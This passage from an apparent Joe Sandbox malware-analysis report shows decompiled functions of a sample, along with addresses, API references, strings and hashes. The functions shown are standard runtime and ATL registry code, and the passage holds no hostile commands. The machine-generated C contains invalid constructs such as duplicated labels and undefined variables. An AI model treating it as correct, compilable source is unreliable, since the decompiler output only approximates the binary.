								(E00977320( &_v8))[6] = 0x1000;
								return 1;
							} else {
								_t52 = E00977320( &_v8);
								(E00977320( &_v8))[1] = _t52 + 0x14;
								_t54 = E00977320( &_v8);
								 *(E00977320( &_v8)) = _t54 + 0x14;
								(E00977320( &_v8))[2] = 2;
								(E00977320( &_v8))[6] = 2;
								return 1;
							}
						}
						return 0;
					}
					_v12 = 0xb3118c;
					goto L10;
				} else {
					return 0;
				}
			}



















                      0x009a9129
                      0x009a912d
                      0x009a9144
                      0x009a9149
                      0x009a914f
                      0x009a9151
                      0x009a9151
                      0x009a914f
                      0x009a9159
                      0x009a9170
                      0x009a9175
                      0x009a917a
                      0x009a9186
                      0x009a918f
                      0x009a9194
                      0x009a9197
                      0x009a9199
                      0x009a91a7
                      0x009a91b0
                      0x009a91b5
                      0x009a91b8
                      0x009a91ba
                      0x00000000
                      0x009a91c5
                      0x009a91bc
                      0x009a91cc
                      0x009a91cc
                      0x009a91d5
                      0x009a91de
                      0x009a91e6
                      0x009a91e8
                      0x009a91f9
                      0x009a9201
                      0x009a9204
                      0x009a922f
                      0x009a9234
                      0x009a9234
                      0x009a923c
                      0x009a923f
                      0x009a929f
                      0x009a92af
                      0x009a92b9
                      0x009a92c8
                      0x00000000
                      0x009a9241
                      0x009a9244
                      0x009a9256
                      0x009a925c
                      0x009a926e
                      0x009a9278
                      0x009a9287
                      0x00000000
                      0x009a928e
                      0x009a923f
                      0x00000000
                      0x009a91ea
                      0x009a919b
                      0x00000000
                      0x009a917c
                      0x00000000
                      0x009a917c

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009A9159
                      • __wcstombs_l.LIBCMTD ref: 009A9214
                        • Part of subcall function 0095BFA0: __crt_unique_heap_ptr.LIBCMTD ref: 0095BFAA
                      Strings
                      • %ls, xrefs: 009A9134
                      • minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp, xrefs: 009A913D
                      • public_stream != nullptr, xrefs: 009A912F
                      • minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp, xrefs: 009A9208
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___crt_unique_heap_ptr__wcstombs_lstd::_
                      • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp$minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp$public_stream != nullptr
                      • API String ID: 4232693209-3092436121
                      • Opcode ID: bdebc9cd3913de4eb40a876d69d14d9a1f510bde537504f4847ab361f0a2bbf5
                      • Instruction ID: f041c3469dfbba63d46fa1a87219b5f2523e461b3339aedea5495e9cb024346f
                      • Opcode Fuzzy Hash: bdebc9cd3913de4eb40a876d69d14d9a1f510bde537504f4847ab361f0a2bbf5
                      • Instruction Fuzzy Hash: D0417571904104EFDB04EFA4D997BEEB7B4AF91344F6084A4E8062B292EB715F48DBC0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009A7D80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON
                      Download Yara Rule
                      C-Code - Quality: 93%
                      			E009A7D80(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char* _a12, intOrPtr _a16, signed char _a20) {
				signed int _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				void* _v73;
				signed char _v74;
				void* _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _t59;
				void* _t72;
				void* _t77;
				void* _t98;
				void* _t99;
				signed int _t100;

				_t99 = __esi;
				_t98 = __edi;
				_t91 = __edx;
				_t77 = __ebx;
				_t59 =  *0xa0600c; // 0x5d529087
				_v8 = _t59 ^ _t100;
				if(_a16 >= (_a8 & 0x000000ff) + 4) {
					if((_a8 & 0x000000ff) != 0) {
						 *_a12 = 0x2d;
						_a12 = _a12 + 1;
						 *_a12 = 0;
						_a16 = _a16 - 1;
					}
					_v72 = "INF";
					_v68 = "INF";
					_v64 = "inf";
					_v60 = "inf";
					_v56 = "NAN";
					_v52 = "NAN";
					_v48 = "nan";
					_v44 = "nan";
					_v40 = "NAN(SNAN)";
					_v36 = "NAN";
					_v32 = "nan(snan)";
					_v28 = "nan";
					_v24 = "NAN(IND)";
					_v20 = "NAN";
					_v16 = "nan(ind)";
					_v12 = "nan";
					_v84 = _a4 - 1;
					if((_a20 & 0x000000ff) == 0) {
						_v80 = 2;
					} else {
						_v80 = 0;
					}
					_v88 = _v80;
					if(_a16 <= E00992E00( *((intOrPtr*)(_t100 + (_v84 << 4) - 0x44 + _v88 * 4)))) {
						_v73 = 0;
					} else {
						_v73 = 1;
					}
					_v74 = _v73;
					if((_v74 & 0x000000ff) != 0) {
						_v92 = 0;
					} else {
						_v92 = 1;
					}
					_t91 = _a16;
					E00994A20(E00992DE0(_a12, _a16,  *((intOrPtr*)(_t100 + (_v84 << 4) - 0x44 + (_v88 + _v92) * 4))), _t70, L"strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit])", L"fp_format_nan_or_infinity", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cvt.cpp", 0x58, 0);
					_t72 = 0;
				} else {
					 *_a12 = 0;
					_t72 = 0xc;
				}
				return E00957280(_t72, _t77, _v8 ^ _t100, _t91, _t98, _t99);
			}
































                      0x009a7d80
                      0x009a7d80
                      0x009a7d80
                      0x009a7d80
                      0x009a7d88
                      0x009a7d8f
                      0x009a7d9c
                      0x009a7db4
                      0x009a7db9
                      0x009a7dc2
                      0x009a7dc8
                      0x009a7dd1
                      0x009a7dd1
                      0x009a7dd4
                      0x009a7ddb
                      0x009a7de2
                      0x009a7de9
                      0x009a7df0
                      0x009a7df7
                      0x009a7dfe
                      0x009a7e05
                      0x009a7e0c
                      0x009a7e13
                      0x009a7e1a
                      0x009a7e21
                      0x009a7e28
                      0x009a7e2f
                      0x009a7e36
                      0x009a7e3d
                      0x009a7e4a
                      0x009a7e53
                      0x009a7e5e
                      0x009a7e55
                      0x009a7e55
                      0x009a7e55
                      0x009a7e68
                      0x009a7e87
                      0x009a7e8f
                      0x009a7e89
                      0x009a7e89
                      0x009a7e89
                      0x009a7e96
                      0x009a7e9f
                      0x009a7eaa
                      0x009a7ea1
                      0x009a7ea1
                      0x009a7ea1
                      0x009a7ed8
                      0x009a7ee9
                      0x009a7ef1
                      0x009a7d9e
                      0x009a7da1
                      0x009a7da4
                      0x009a7da4
                      0x009a7f00

                      APIs
                      Strings
                      • fp_format_nan_or_infinity, xrefs: 009A7EBA
                      • minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 009A7EB5
                      • strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit]), xrefs: 009A7EBF
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __aligned_msize__invoke_watson_if_error_strlen
                      • String ID: fp_format_nan_or_infinity$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit])
                      • API String ID: 2470549621-3631232711
                      • Opcode ID: 834b092aa08d12349e4c9226eab2171bf2d8801fba30f429226780d8e23283bd
                      • Instruction ID: 9f7512569d0dfb3001941ff34f34767f80dd5fb7be79d2e7b9d4d0ecd712f329
                      • Opcode Fuzzy Hash: 834b092aa08d12349e4c9226eab2171bf2d8801fba30f429226780d8e23283bd
                      • Instruction Fuzzy Hash: 414147B090938D9BDF21CFA9D8457EEBBF1BF85708F144059E8116B382D3B59909CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00965350 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON
                      Download Yara Rule
                      C-Code - Quality: 92%
                      			E00965350(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v36;
				char _v44;
				char _v60;
				char* _t34;
				signed char _t37;
				char* _t38;
				intOrPtr _t44;
				intOrPtr* _t46;
				char* _t53;
				char* _t73;
				intOrPtr _t74;
				char* _t78;
				char _t84;

				_t34 =  *0xb30640; // 0x0
				if( *_t34 != 0) {
					_t78 =  *0xb30640; // 0x0
					__eflags =  *_t78 - 0x30;
					if( *_t78 < 0x30) {
						L5:
						E00969C90( &_v60);
						_t37 = E0095FA10( &_v60);
						__eflags = _t37 & 0x000000ff;
						if((_t37 & 0x000000ff) == 0) {
							L10:
							_t38 =  *0xb30640; // 0x0
							__eflags =  *_t38;
							if( *_t38 != 0) {
								_v8 = E0095F350( &_v44, 2);
							} else {
								_v8 = E0095F350( &_v36, 1);
							}
							_v12 = _v8;
							E0095F240(_a4, _v12);
							return _a4;
						}
						_t44 =  *0xb30640; // 0x0
						 *0xb30640 = _t44 + 1;
						_t46 = E0095FA30( &_v60);
						_v20 =  *_t46;
						_v16 =  *((intOrPtr*)(_t46 + 4));
						__eflags = _a8 - 0x42;
						if(__eflags != 0) {
							__eflags = _a8 - 0x41;
							if(__eflags != 0) {
								goto L10;
							}
							_push(_v16);
							E0095EED0(_v20, __eflags, _a4, _v20);
							return _a4;
						}
						_push(_v16);
						L0095EF60(_v20, __eflags, _a4, _v20);
						return _a4;
					}
					_t73 =  *0xb30640; // 0x0
					_t84 =  *_t73;
					__eflags = _t84 - 0x39;
					if(_t84 > 0x39) {
						goto L5;
					}
					_t53 =  *0xb30640; // 0x0
					asm("cdq");
					_v28 =  *_t53 - 0x2f;
					_v24 = _t84;
					_t74 =  *0xb30640; // 0x0
					 *0xb30640 = _t74 + 1;
					E0095F510(__ebx, _a4, __edi, __esi, _v28, _v24);
					return _a4;
				}
				E0095F350(_a4, 1);
				return _a4;
			}






















                      0x00965356
                      0x00965360
                      0x00965374
                      0x0096537d
                      0x00965380
                      0x009653c9
                      0x009653cd
                      0x009653d8
                      0x009653e0
                      0x009653e2
                      0x00965444
                      0x00965444
                      0x0096544c
                      0x0096544e
                      0x00965469
                      0x00965450
                      0x0096545a
                      0x0096545a
                      0x0096546f
                      0x00965479
                      0x00000000
                      0x0096547e
                      0x009653e4
                      0x009653ec
                      0x009653f4
                      0x009653fe
                      0x00965401
                      0x00965404
                      0x00965408
                      0x00965425
                      0x00965429
                      0x00000000
                      0x00000000
                      0x0096542e
                      0x00965437
                      0x00000000
                      0x0096543f
                      0x0096540d
                      0x00965416
                      0x00000000
                      0x0096541e
                      0x00965382
                      0x00965388
                      0x0096538b
                      0x0096538e
                      0x00000000
                      0x00000000
                      0x00965390
                      0x0096539b
                      0x0096539c
                      0x0096539f
                      0x009653a2
                      0x009653ab
                      0x009653bc
                      0x00000000
                      0x009653c1
                      0x00965367
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00965367
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::DName.LIBVCRUNTIMED ref: 009653BC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$Name::$Node::makeStatus
                      • String ID: A
                      • API String ID: 3739413223-3554254475
                      • Opcode ID: 0fdaaaf1bca12408ab3455c0faf1ffa28cdf2b046d931f295eb48ffd1b27048e
                      • Instruction ID: 3a0e820455306257d7b733f930ea2c6ef73739bb3dc838eb2b34e62e996fdb68
                      • Opcode Fuzzy Hash: 0fdaaaf1bca12408ab3455c0faf1ffa28cdf2b046d931f295eb48ffd1b27048e
                      • Instruction Fuzzy Hash: 1C4162B1A00518EFDB08DF95D8A19AE7BB5BF84341F148059F91ADB265DB30EE45CB80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009445F0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 101registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 66%
                      			E009445F0(void* __ecx, void* __esi, void* _a4, char* _a8, int _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _t37;
				long _t39;
				void* _t44;
				void* _t48;
				void* _t64;
				void* _t69;
				void* _t70;

				_t68 = __esi;
				_v28 = 0xcccccccc;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				do {
					_t72 = _a4;
					if(_a4 == 0) {
						_t37 = L00994930(_t72, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x16fb, 0, "%ls", L"hKeyParent != 0");
						_t70 = _t70 + 0x18;
						if(_t37 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				_v16 = 0;
				if( *((intOrPtr*)(_v8 + 8)) == 0) {
					_t68 = _t70;
					_t64 = _a4;
					_t39 = RegOpenKeyExA(_t64, _a8, 0, _a12,  &_v16);
					__eflags = _t70 - _t70;
					_v28 = E009D1520(_t39, _t70 - _t70);
				} else {
					_t64 = _a8;
					_v28 = E009430F0( *((intOrPtr*)(_v8 + 8)), _t68, _a4, _t64, 0, _a12,  &_v16);
				}
				_v24 = _v28;
				if(_v24 == 0) {
					_v24 = E00944420(_v8, _t68);
					_t77 = _v24;
					if(_v24 != 0) {
						_t48 = L00994930(_t77, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1703, 0, "%ls", L"lRes == 0L");
						_t70 = _t70 + 0x18;
						if(_t48 == 1) {
							asm("int3");
						}
					}
					 *_v8 = _v16;
					_t64 = _v8;
					 *(_t64 + 4) = _a12 & 0x00000300;
				}
				_push(_t64);
				_push(_v24);
				E009D14C0(_t69, 0x944718);
				_pop(_t44);
				return E009D1520(_t44, _t69 - _t70 + 0x18);
			}
















                      0x009445f0
                      0x009445fc
                      0x009445ff
                      0x00944602
                      0x00944605
                      0x00944608
                      0x0094460b
                      0x0094460e
                      0x00944611
                      0x00944611
                      0x00944615
                      0x0094462f
                      0x00944634
                      0x0094463a
                      0x0094463c
                      0x0094463c
                      0x0094463a
                      0x0094463d
                      0x00944641
                      0x0094464f
                      0x00944673
                      0x00944683
                      0x00944687
                      0x0094468d
                      0x00944694
                      0x00944651
                      0x0094465b
                      0x0094466e
                      0x0094466e
                      0x0094469a
                      0x009446a1
                      0x009446ab
                      0x009446ae
                      0x009446b2
                      0x009446cc
                      0x009446d1
                      0x009446d7
                      0x009446d9
                      0x009446d9
                      0x009446d7
                      0x009446e0
                      0x009446eb
                      0x009446ee
                      0x009446ee
                      0x009446f4
                      0x009446f7
                      0x009446fe
                      0x00944703
                      0x00944713

                      APIs
                      • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,00000000,?,0094AED1,00000000,?), ref: 00944687
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009446FE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckOpenStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$hKeyParent != 0$lRes == 0L
                      • API String ID: 2727503844-1643637747
                      • Opcode ID: 318f1c46bf4316379087309abcb80903030545747021ecbf334108c490c31b7c
                      • Instruction ID: 8e7154d78eee999a72a9ea9662e090b0475eda1b2a265a2b0a6084a95582bc8f
                      • Opcode Fuzzy Hash: 318f1c46bf4316379087309abcb80903030545747021ecbf334108c490c31b7c
                      • Instruction Fuzzy Hash: 5D314375E40209EFDB04DF98D952FAEB7B4BB88704F208559F605A7281E7705E50CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0094C1E0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 98COMMON
                      Download Yara Rule
                      C-Code - Quality: 66%
                      			E0094C1E0(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr* _v12;
				char _v24;
				intOrPtr* _v32;
				intOrPtr _v36;
				char _v44;
				intOrPtr* _t35;
				void* _t42;
				intOrPtr _t46;
				void* _t48;
				void* _t50;
				intOrPtr _t67;
				void* _t74;
				void* _t75;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t80;

				_t67 = __edx;
				_t74 =  &_v44;
				memset(_t74, 0xcccccccc, 0xa << 2);
				_t79 = _t78 + 0xc;
				_t75 = _t74 + 0xa;
				if(_a4 != 0) {
					_v8 = 0;
					_push(0x9d8724);
					_t35 = E009579A0(0xc);
					_t80 = _t79 + 8;
					_v32 = _t35;
					_v12 = _v32;
					__eflags = _v12;
					if(_v12 != 0) {
						 *_v12 = _a8;
						 *((intOrPtr*)(_v12 + 4)) = _a12;
						E00951D00(__ebx,  &_v24, _t75, __esi, _a4 + 0xc, 0);
						_v8 = E00951D90( &_v24, __esi);
						__eflags = _v8;
						if(__eflags < 0) {
							_t67 = _v12;
							_v36 = _t67;
							E009582A0(_v36);
							_t42 = E0094F210(0xb33704);
							E009423E0(__ebx, _t75, __esi, __eflags, E009423B0( &_v44, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20fc), _t42, 0, "ERROR : Unable to lock critical section in AtlModuleAddTermFunc\n", 0xc);
							_t80 = _t80 + 0x18;
							__eflags = 0;
							if(0 == 0) {
								_t50 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20fd, 0, "%ls", 0x9f40dc);
								_t80 = _t80 + 0x18;
								__eflags = _t50 - 1;
								if(_t50 == 1) {
									asm("int3");
								}
							}
						} else {
							_t67 =  *((intOrPtr*)(_a4 + 8));
							 *((intOrPtr*)(_v12 + 8)) = _t67;
							 *((intOrPtr*)(_a4 + 8)) = _v12;
						}
						E00951D60( &_v24);
					} else {
						_v8 = 0x8007000e;
					}
					_t46 = _v8;
				} else {
					_t46 = 0x80070057;
				}
				_push(_t67);
				E009D14C0(_t77, 0x94c31c);
				_t48 = _t46;
				return E009D1520(_t48, _t77 - _t80 + 0x28);
			}





















                      0x0094c1e0
                      0x0094c1e7
                      0x0094c1f4
                      0x0094c1f4
                      0x0094c1f4
                      0x0094c1fa
                      0x0094c206
                      0x0094c20d
                      0x0094c214
                      0x0094c219
                      0x0094c21c
                      0x0094c222
                      0x0094c225
                      0x0094c229
                      0x0094c23d
                      0x0094c245
                      0x0094c254
                      0x0094c261
                      0x0094c264
                      0x0094c268
                      0x0094c281
                      0x0094c284
                      0x0094c28d
                      0x0094c2a1
                      0x0094c2ba
                      0x0094c2bf
                      0x0094c2c2
                      0x0094c2c4
                      0x0094c2de
                      0x0094c2e3
                      0x0094c2e6
                      0x0094c2e9
                      0x0094c2eb
                      0x0094c2eb
                      0x0094c2e9
                      0x0094c26a
                      0x0094c270
                      0x0094c273
                      0x0094c27c
                      0x0094c27c
                      0x0094c2ef
                      0x0094c22b
                      0x0094c22b
                      0x0094c22b
                      0x0094c2f4
                      0x0094c1fc
                      0x0094c1fc
                      0x0094c1fc
                      0x0094c2f7
                      0x0094c301
                      0x0094c306
                      0x0094c316

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0094C301
                      Strings
                      • %ls, xrefs: 0094C2CB
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094C2AC
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094C2D7
                      • ERROR : Unable to lock critical section in AtlModuleAddTermFunc, xrefs: 0094C295
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to lock critical section in AtlModuleAddTermFunc
                      • API String ID: 930174750-2929966712
                      • Opcode ID: 795e148496ea17ac70cf1ca68fd91a8ade924533032db2604b912784701e4810
                      • Instruction ID: d8f3af7b5384f5c5fda10c06185879f9a6f93a69e52917099c82e3bc2fc02202
                      • Opcode Fuzzy Hash: 795e148496ea17ac70cf1ca68fd91a8ade924533032db2604b912784701e4810
                      • Instruction Fuzzy Hash: 363181B4E41208EFDB04EFD4D852FAEB7B4EB84715F108059F9057B392DAB49A44CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00944960 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 93registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 67%
                      			E00944960(void** __ecx, void* __esi, char* _a4, char* _a8) {
				void** _v8;
				char* _v12;
				int _v16;
				void** _v20;
				int _v24;
				int _v28;
				void* _t36;
				long _t41;
				void* _t42;
				void* _t44;
				void* _t45;
				void* _t58;
				void* _t59;

				_v28 = 0xcccccccc;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				do {
					_t61 =  *_v8;
					if( *_v8 == 0) {
						_t45 = L00994930(_t61, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1886, 0, "%ls", L"m_hKey != 0");
						_t59 = _t59 + 0x18;
						if(_t45 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				L5:
				L5:
				if(_a8 == 0) {
					_v28 = 0;
				} else {
					_v28 = 1;
				}
				_v24 = _v28;
				_t65 = _v24;
				if(_v24 == 0) {
					_t44 = L00994930(_t65, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1887, 0, "%ls", L"__atl_condVal");
					_t59 = _t59 + 0x18;
					if(_t44 == 1) {
						asm("int3");
					}
				}
				if(_v24 != 0) {
					goto L13;
				}
				_t42 = 0xd;
				L17:
				return E009D1520(_t42, _t58 - _t59 + 0x18);
				L13:
				__eflags = 0;
				if(0 != 0) {
					goto L5;
				}
				_v16 = 0;
				_v12 = _a8;
				do {
					_t36 = E00992E00(_v12);
					_t59 = _t59 + 4;
					_v20 = _t36 + 1;
					_v12 = _v12 + _v20;
					_v16 = _v16 + _v20;
					__eflags = _v20 - 1;
				} while (_v20 != 1);
				_t41 = RegSetValueExA( *_v8, _a4, 0, 7, _a8, _v16);
				__eflags = _t59 - _t59;
				_t42 = E009D1520(_t41, __eflags);
				goto L17;
			}
















                      0x0094496c
                      0x0094496f
                      0x00944972
                      0x00944975
                      0x00944978
                      0x0094497b
                      0x0094497e
                      0x00944981
                      0x00944984
                      0x00944987
                      0x009449a1
                      0x009449a6
                      0x009449ac
                      0x009449ae
                      0x009449ae
                      0x009449ac
                      0x009449af
                      0x00000000
                      0x009449b3
                      0x009449b7
                      0x009449c2
                      0x009449b9
                      0x009449b9
                      0x009449b9
                      0x009449cc
                      0x009449cf
                      0x009449d3
                      0x009449ed
                      0x009449f2
                      0x009449f8
                      0x009449fa
                      0x009449fa
                      0x009449f8
                      0x009449ff
                      0x00000000
                      0x00000000
                      0x00944a01
                      0x00944a69
                      0x00944a76
                      0x00944a08
                      0x00944a08
                      0x00944a0a
                      0x00000000
                      0x00000000
                      0x00944a0c
                      0x00944a16
                      0x00944a19
                      0x00944a1d
                      0x00944a22
                      0x00944a28
                      0x00944a31
                      0x00944a3a
                      0x00944a3d
                      0x00944a3d
                      0x00944a5b
                      0x00944a61
                      0x00944a63
                      0x00000000

                      APIs
                      • _strlen.LIBCMT ref: 00944A1D
                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000007,00000000,00000000), ref: 00944A5B
                      Strings
                      Memory Dump Source
